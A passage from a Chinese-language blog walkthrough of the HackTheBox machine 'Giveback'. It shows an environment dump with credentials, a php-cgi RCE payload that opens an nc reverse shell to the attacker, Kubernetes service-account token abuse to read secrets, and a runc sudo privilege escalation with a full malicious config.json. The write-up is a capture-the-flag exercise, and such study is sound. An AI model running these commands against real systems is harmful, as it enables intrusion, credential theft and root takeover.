              <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;wordpress-59cf8f55c7-mjhp5:/opt/bitnami/wordpress$ <span class="built_in">env</span>|grep -i pass ; <span class="built_in">env</span> |grep -i name ;<span class="built_in">env</span>|grep -i 10.</span><br><span class="line">&lt;v|grep -i pass ; <span class="built_in">env</span> |grep -i name ;<span class="built_in">env</span>|grep -i 10.</span><br><span class="line">WORDPRESS_SMTP_PASSWORD=</span><br><span class="line">WORDPRESS_DATABASE_PASSWORD=sW5sp4spa3u7RLyetrekE4oS</span><br><span class="line">WORDPRESS_PASSWORD=O8F7KR5zGi</span><br><span class="line">ALLOW_EMPTY_PASSWORD=<span class="built_in">yes</span></span><br><span class="line">WORDPRESS_SMTP_FROM_NAME=FirstName LastName</span><br><span class="line">HOSTNAME=beta-vino-wp-wordpress-59cf8f55c7-mjhp5</span><br><span class="line">WORDPRESS_FIRST_NAME=FirstName</span><br><span class="line">WORDPRESS_DATABASE_NAME=bitnami_wordpress</span><br><span class="line">WORDPRESS_USERNAME=user</span><br><span class="line">WORDPRESS_BLOG_NAME=User<span class="string">&#x27;s Blog!</span></span><br><span class="line"><span class="string">WORDPRESS_LAST_NAME=LastName</span></span><br><span class="line"><span class="string">BITNAMI_APP_NAME=wordpress</span></span><br><span class="line"><span class="string">OS_NAME=linux</span></span><br><span class="line"><span class="string">WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80</span></span><br><span class="line"><span class="string">LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241</span></span><br><span class="line"><span class="string">BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80</span></span><br><span class="line"><span class="string">LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000</span></span><br><span class="line"><span class="string">BETA_VINO_WP_MARIADB_PORT_3306_TCP=tcp://10.43.147.82:3306</span></span><br><span class="line"><span class="string">KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443</span></span><br><span class="line"><span class="string">WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242</span></span><br><span class="line"><span class="string">WP_NGINX_SERVICE_PORT=tcp://10.43.4.242:80</span></span><br><span class="line"><span class="string">BETA_VINO_WP_MARIADB_PORT=tcp://10.43.147.82:3306</span></span><br><span class="line"><span class="string">LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241</span></span><br><span class="line"><span class="string">BETA_VINO_WP_WORDPRESS_PORT=tcp://10.43.61.204:80</span></span><br><span class="line"><span class="string">WP_NGINX_SERVICE_PORT_80_TCP_ADDR=10.43.4.242</span></span><br><span class="line"><span class="string">BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443</span></span><br><span class="line"><span class="string">BETA_VINO_WP_MARIADB_PORT_3306_TCP_ADDR=10.43.147.82</span></span><br><span class="line"><span class="string">BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204</span></span><br><span class="line"><span class="string">KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1</span></span><br><span class="line"><span class="string">BETA_VINO_WP_WORDPRESS_PORT_443_TCP_ADDR=10.43.61.204</span></span><br><span class="line"><span class="string">KUBERNETES_SERVICE_HOST=10.43.0.1</span></span><br><span class="line"><span class="string">KUBERNETES_PORT=tcp://10.43.0.1:443</span></span><br><span class="line"><span class="string">LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000</span></span><br><span class="line"><span class="string">BETA_VINO_WP_WORDPRESS_PORT_80_TCP_ADDR=10.43.61.204</span></span><br><span class="line"><span class="string">BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82</span></span><br></pre></td></tr></table></figure></div>
              </div>
            </details>


  <div class="note-large green">
    <div class="notel-title rounded-t-lg p-3 font-bold text-lg flex flex-row gap-2 items-center">
      <i class="notel-icon fa-solid fa-upload"></i><p>文件传输技巧</p>

    </div>
    <div class="notel-content">
      <p>由于容器环境限制，无法使用常规命令下载文件。这里采用 <code>nc</code> 和文件描述符的方式传输 <code>ligo-agent</code> 以进行内网代理。</p>
<p><strong>攻击机 (发送文件):</strong></p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp PORT &lt; file</span><br></pre></td></tr></table></figure></div>

<p><strong>靶机 (接收文件):</strong></p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1. 建立 TCP 连接并绑定到文件描述符 3</span></span><br><span class="line"><span class="built_in">exec</span> 3&lt;&gt;/dev/tcp/IP/PORT</span><br><span class="line"><span class="comment"># 2. 从文件描述符 3 读取数据并写入文件</span></span><br><span class="line"><span class="built_in">cat</span> &lt;&amp;3 &gt; agent</span><br><span class="line"><span class="comment"># 3. 关闭连接</span></span><br><span class="line"><span class="built_in">exec</span> 3&gt;&amp;-</span><br></pre></td></tr></table></figure></div>
<p>该方法通过 shell 的特殊重定向功能，将网络连接视为文件进行读写，非常适用于受限环境。</p>

    </div>
  </div>

<p>根据环境变量中的信息，探测 <code>10.43.2.241:5000</code>，发现一个可利用的 php-cgi RCE。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251105233847240.png"
                      alt="image-20251105233847240"
                ></p>

  <div class="note p-4 mb-4 rounded-small info">
    <p>此漏洞类似于 <a class="link"   target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/52331" >CVE-2024-4577<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>，但在该靶机环境中，可以直接在 POST 请求体中发送 Linux 命令执行，而无需 <code>&lt;?php ... ?&gt;</code> 标签。</p>

  </div>

<h3 id="shell2"><a href="#shell2" class="headerlink" title="shell2"></a>shell2</h3><p>利用 php-cgi RCE 获取第二个容器的 Shell。</p>
<div class="code-container" data-rel="Php"><figure class="iseeu highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php -r <span class="string">&#x27;$p=&quot;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.10.16.65 4488 &gt; /tmp/f&quot;; $o = [&quot;http&quot;=&gt;[&quot;method&quot;=&gt;&quot;POST&quot;, &quot;header&quot;=&gt;&quot;Content-Type: application/x-www-form-urlencoded&quot;,&quot;content&quot;=&gt;$p,&quot;timeout&quot;=&gt;4]]; $c=stream_context_create($o); $r=@file_get_contents(&quot;http://legacy-intranet-service:5000/cgi-bin/php-cgi?--define+allow_url_include%3don+--define+auto_prepend_file%3dphp://input&quot;,false,$c); echo $r===false?&quot;&quot;:substr($r,0,5000);&#x27;</span></span><br></pre></td></tr></table></figure></div>
<p>在新容器中进行信息枚举。</p>
<h4 id="k8s-enum"><a href="#k8s-enum" class="headerlink" title="k8s enum"></a>k8s enum</h4>
  <div class="note p-4 mb-4 rounded-small blue icon-padding">
    <i class="note-icon fa-solid fa-key"></i><p>在新容器中，发现了 Kubernetes (K8s) 的 Service Account Token，这是横向移动和提权的关键。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251109151337216.png"
                      alt="image-20251109151337216"
                ></p>

  </div>

<p>首先确定当前命名空间 (<code>namespace</code>) 为 <code>default</code>  <code>cat /var/run/secrets/kubernetes.io/serviceaccount/namespace</code>。<br>然后利用 Token 尝试列出该命名空间下的 <code>secrets</code>。</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># TOKEN 变量需要替换为获取到的真实 Token</span></span><br><span class="line">curl -k -H <span class="string">&quot;Authorization: Bearer <span class="variable">$TOKEN</span>&quot;</span> https://<span class="variable">$KUBERNETES_SERVICE_HOST</span>:<span class="variable">$KUBERNETES_SERVICE_PORT</span>/api/v1/namespaces/default/secrets</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251109162744272.png"
                      alt="image-20251109162744272"
                ></p>
<p>发现了三个 secret，将其中的密码进行 Base64 解码后，成功获得了 SSH 登录凭据。</p>
<h2 id="User"><a href="#User" class="headerlink" title="User"></a>User</h2><p>使用从 K8s secret 中获取的凭据成功 SSH 登录，拿到 <code>user.txt</code>。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251109163001705.png"
                      alt="image-20251109163001705"
                ></p>
<h3 id="priv-esc"><a href="#priv-esc" class="headerlink" title="priv_esc"></a>priv_esc</h3><p>使用 <code>sudo -l</code> 发现当前用户可以免密码执行 <code>/opt/debug</code>。</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">babywyrm@giveback:~$ <span class="built_in">sudo</span> /opt/debug --<span class="built_in">help</span></span><br><span class="line">[<span class="built_in">sudo</span>] password <span class="keyword">for</span> babywyrm: </span><br><span class="line">Validating <span class="built_in">sudo</span>...</span><br><span class="line">Please enter the administrative password: </span><br></pre></td></tr></table></figure></div>


  <div class="note p-4 mb-4 rounded-small red icon-padding">
    <i class="note-icon fa-solid fa-lightbulb"></i><p>执行 <code>/opt/debug</code> 时，除了 <code>sudo</code> 密码外，还需要一个额外的“管理员密码”。依旧是想到之前获取到了一堆密码，挨个试了一遍发现没有能用的，看了别的师傅的wp 发现这个密码是之前从 <code>wp-config.php</code> 中获得的数据库密码 <code>sW5sp4spa3u7RLyetrekE4oS</code> 进行 <strong>Base64 编码</strong>后的结果。<del class="mask">不是哥们我真想不明白为啥了，这都是咋发现的</del></p>

  </div>

<p>执行后发现 <code>/opt/debug</code> 实际上是 <code>runc</code>，一个容器运行时工具。这意味着我们可以通过 <code>runc</code> 以 root 权限运行一个容器，从而实现提权。</p>
<details class="cyan" data-header-exclude><summary><i class="fa-solid fa-chevron-right"></i>Gemini 对 runc 提权的解释 </summary>
              <div class='content'>
              <blockquote><p><strong>既然你拥有 <code>sudo /opt/debug</code> 的权限来执行 <code>runc</code>，这意味着你获得了以 <code>root</code> 权限操作容器的能力。这通常可以导致直接的本地权限提升 (Local Privilege Escalation)。</strong></p><p>主要的利用思路是：<strong>通过 <code>runc</code> 启动一个特权容器，然后从容器内部访问或控制宿主机。</strong></p><p class='h4' id="1-直接获取宿主机-root-shell-最直接"><a href="#1-直接获取宿主机-root-shell-最直接" class="headerlink" title="1. 直接获取宿主机 root shell (最直接)"></a><strong>1. 直接获取宿主机 <code>root</code> shell (最直接)</strong></h4><p><strong>思路:</strong> 创建一个 <code>runc</code> 容器 bundle，其中包含一个配置，让容器的根文件系统映射到宿主机的根文件系统 (<code>/</code>)，并以 <code>root</code> 用户身份启动容器。</p><p><strong>步骤:</strong></p><ol><li><strong>创建一个工作目录：</strong><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> /tmp/runc_exploit &amp;&amp; <span class="built_in">cd</span> /tmp/runc_exploit</span><br></pre></td></tr></table></figure></div></li><li><strong>生成一个默认的 <code>config.json</code>：</strong><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> /opt/debug spec</span><br></pre></td></tr></table></figure></div></li><li><strong>修改 <code>config.json</code> (关键步骤)：</strong><ul><li><strong>更改 <code>process.args</code>：</strong> 确保容器启动后执行一个 shell，例如 <code>[&quot;/bin/sh&quot;]</code>。</li><li><strong>更改 <code>root.path</code>：</strong> 将 <code>&quot;path&quot;: &quot;rootfs&quot;</code> 改为 <code>&quot;path&quot;: &quot;/&quot;</code>，将容器的根指向宿主机的根。</li><li><strong>取消命名空间隔离：</strong> 将 <code>linux.namespaces</code> 数组清空 (<code>&quot;namespaces&quot;: []</code>)，使容器共享宿主机的命名空间。</li><li><strong>确保用户是 <code>root</code>：</strong> 检查 <code>process.user</code> 中 <code>uid</code> 和 <code>gid</code> 均为 <code>0</code>。</li></ul></li></ol></blockquote>
              </div>
            </details>

<h2 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h2><p>根据上述原理，创建一个恶意的 <code>config.json</code> 文件。</p>
<div class="code-container" data-rel="Json"><figure class="iseeu highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;ociVersion&quot;</span><span class="punctuation">:</span> <span class="string">&quot;1.0.2-dev&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;process&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;terminal&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;user&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;uid&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;gid&quot;</span><span class="punctuation">:</span> <span class="number">0</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            <span class="string">&quot;sh&quot;</span></span><br><span class="line">        <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            <span class="string">&quot;PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="string">&quot;TERM=xterm&quot;</span></span><br><span class="line">        <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;rlimits&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">            <span class="punctuation">&#123;</span></span><br><span class="line">                <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;RLIMIT_NOFILE&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;hard&quot;</span><span class="punctuation">:</span> <span class="number">1024</span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;soft&quot;</span><span class="punctuation">:</span> <span class="number">1024</span></span><br><span class="line">            <span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;root&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;path&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;readonly&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;mounts&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;linux&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="attr">&quot;resources&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;devices&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                <span class="punctuation">&#123;</span></span><br><span class="line">                    <span class="attr">&quot;allow&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line">                    <span class="attr">&quot;access&quot;</span><span class="punctuation">:</span> <span class="string">&quot;rwm&quot;</span></span><br><span class="line">                <span class="punctuation">&#125;</span></span><br><span class="line">            <span class="punctuation">]</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="attr">&quot;namespaces&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure></div>

<p>在 <code>config.json</code> 所在目录执行 <code>runc</code>，成功获取 root shell。</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">babywyrm@giveback:/tmp/runc_exploit$ <span class="built_in">sudo</span> /opt/debug run my-pwned-container</span><br><span class="line">Validating <span class="built_in">sudo</span>...</span><br><span class="line">Please enter the administrative password: </span><br><span class="line"></span><br><span class="line">Both passwords verified. Executing the <span class="built_in">command</span>...</span><br><span class="line"><span class="comment"># id</span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)</span><br><span class="line"><span class="comment"># cat /root/root.txt</span></span><br><span class="line">de908a3fd95009a267e400d7699bec6e</span><br></pre></td></tr></table></figure></div>

<h2 id="More-in-this-box"><a href="#More-in-this-box" class="headerlink" title="More in this box"></a>More in this box</h2><div class="tabs" id="tab-more-info"><ul class="nav-tabs"><li class="tab active"><a class="#more-info-1">debug 脚本分析</a></li><li class="tab"><a class="#more-info-2">php-cgi 后端代码</a></li><li class="tab"><a class="#more-info-3">关于K8S</a></li></ul><div class="tab-content"><div class="tab-pane active" id="more-info-1"><p><code>/opt/debug</code> 脚本的核心逻辑是验证 <code>sudo</code> 和一个额外的管理员密码，然后执行 <code>runc</code>。</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Mandate safe paths </span></span><br><span class="line"><span class="built_in">export</span> PATH=<span class="string">&quot;/usr/sbin:/usr/bin:/sbin:/bin&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 密码是 Base64 编码后的</span></span><br><span class="line">ADMIN_OVERRIDE=<span class="string">&quot;c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9T&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># ... (省略部分代码) ...</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Call admin check</span></span><br><span class="line">ask_for_additional_password</span><br><span class="line"></span><br><span class="line"><span class="comment"># Once verified execute runc debug </span></span><br><span class="line"><span class="variable">$ECHO_BIN</span> <span class="string">&quot;Both passwords verified. Executing the command...&quot;</span></span><br><span class="line"><span class="variable">$SUDO_BIN</span> /var/lib/rancher/k3s/data/e50868881d9744d0d0027dda983507e867b3787482eb00005d97239d9aa501a5/bin/runc.amd64.debug <span class="string">&quot;<span class="variable">$@</span>&quot;</span></span><br></pre></td></tr></table></figure></div></div><div class="tab-pane" id="more-info-2"><p>php-cgi 的后端代码显示，它直接将 POST 请求的内容传递给 <code>passthru</code> 函数执行，导致了直接的远程命令执行。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/7ed0b3a84a3dbc6157b334f294f2fa0b.png"
                      alt="7ed0b3a84a3dbc6157b334f294f2fa0b"
                ></p></div><div class="tab-pane" id="more-info-3"><p>Kubernetes (K8s) 采用基于角色的访问控制 (RBAC) 体系。通过枚举 <code>roles</code>、<code>clusterroles</code> 以及它们绑定的 <code>serviceaccount</code>，可以清晰地了解当前 Token 所拥有的权限（例如，可以对哪些资源 <code>resource</code> 执行哪些操作 <code>verb</code>）。<br>!Read More <a target="_blank" rel="noopener" href="https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-3.png"><sup>11</sup></a></p>
<p>可以使用如 <code>kdigger</code> 这样的工具来自动化枚举 K8s 环境中的安全配置和潜在攻击面。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251109172043039.png"
                     
                ></p>
<p><strong>更多信息请参考:</strong><br><a class="button  regular" target="_blank" rel="noopener" href='https://cloud.hacktricks.wiki/zh/pentesting-cloud/kubernetes-security/kubernetes-enumeration.html' title='Kubernetes Pentesting (HackTricks)'><i class='fa-solid fa-book'></i> Kubernetes Pentesting (HackTricks)</a><br><a class="button  regular" target="_blank" rel="noopener" href='https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1' title='Kubernetes Pentest Methodology (CyberArk)'><i class='fa-solid fa-book'></i> Kubernetes Pentest Methodology (CyberArk)</a></p></div></div></div>
		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> HTB_Giveback</li>
        <li><strong>Author:</strong> EnchanterW</li>
        <li><strong>Created at
                :</strong> 2025-11-09 18:00:00</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-11-15 14:54:46
            </li>
        
        <li>
            <strong>Link:</strong> https://enchanter-w.github.io/2025/11/09/HTB_Giveback/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">#渗透测试</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/K8s/">#K8s</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Linux/">#Linux</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/%E5%AE%B9%E5%99%A8/">#容器</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/11/21/HTB_eighteen/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">HTB - Eighteen Writeup</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2025/09/20/THM_Reset/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">THM_Reset From OSCPlike list.</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="giscus-container"></div>
    <script data-swup-reload-script defer>
        async function loadGiscus() {
            const giscusConfig = {
                'src': 'https://giscus.app/client.js',
                'data-repo': 'Enchanter-W/giscus_comment',
                'data-repo-id': 'R_kgDOPzpiow',
                'data-category': 'Announcements',
                'data-category-id': 'DIC_kwDOPzpio84CvroL',
                'data-mapping': 'pathname',
                'data-strict': '0',
                'data-reactions-enabled': '1',
                'data-emit-metadata': '1',
                'data-theme': 'preferred_color_scheme',
                'data-lang': 'zh-CN',
                'data-input-position': 'top',
                'data-loading': 'lazy',
                'crossorigin': 'anonymous',
                'async': true
            }
            const giscusScript = document.createElement('script');
            for (const key in giscusConfig) {
                giscusScript.setAttribute(key, giscusConfig[key]);
            }
            document.getElementById('giscus-container').appendChild(giscusScript);
        }
        if ('true') {
            let loadGiscusTimeout = setTimeout(() => {
                loadGiscus();
                clearTimeout(loadGiscusTimeout);
            }, 1000);
        } else {
            document.addEventListener('DOMContentLoaded', loadGiscus);
        }
    </script>


        
        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">HTB_Giveback</div>
		<ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Scan"><span class="nav-text">Scan</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shell"><span class="nav-text">Shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#shell1"><span class="nav-text">shell1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shell2"><span class="nav-text">shell2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#User"><span class="nav-text">User</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#priv-esc"><span class="nav-text">priv_esc</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Root"><span class="nav-text">Root</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#More-in-this-box"><span class="nav-text">More in this box</span></a></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2024</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">EnchanterW</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        19 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
